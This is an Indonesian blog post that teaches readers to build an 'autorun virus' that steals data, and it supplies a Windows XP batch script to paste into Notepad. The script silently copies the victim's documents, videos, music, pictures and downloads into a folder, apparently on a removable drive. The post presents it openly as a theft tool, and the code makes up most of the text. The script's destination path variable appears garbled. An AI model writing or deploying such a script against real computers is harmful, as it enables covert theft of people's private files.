Membuat Autorun Virus Yang Bisa Mencuri Data
Disini Saya Akan Menjelaskan Cara Membuat Autorun Virus Yang Bisa Mencuri Data.
Autorun ini hanya berisi intruksi intruksi untuk mencuri, dan tidak ada intruksi-intruksi yang
sangat berbahaya bagi sistem komputer.
Kalian hanya cukup melakukan copy lalu paste bacth di bawah ini ke notepad.
Untuk Window XP
@echo off
:CHECK
if not exist "%&&&&%\Copied_files" md "%&&&&%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR
:COPIER
if not exist "%&&&&%\Copied_files\%computername%" md "%&&&&%\Copied_files\%computername%"
if not exist "%&&&&%\Copied_files\%computername%\VIDEOS" md "%&&&&%\Copied_files\%computername%\VIDEOS"
if not exist "%&&&&%\Copied_files\%computername%\PICTURES" md
"%&&&&%\Copied_files\%computername%\PICTURES"
if not exist "%&&&&%\Copied_files\%computername%\MUSIC" md "%&&&&%\Copied_files\%computername%\MUSIC"
if not exist "%&&&&%\Copied_files\%computername%\DOWNLOADS" md
"%&&&&%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%&&&&%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%&&&&%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%&&&&%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%&&&&%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%&&&&%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit
:ERROR
exit
Read more »
Labels: Synra Virus Lab™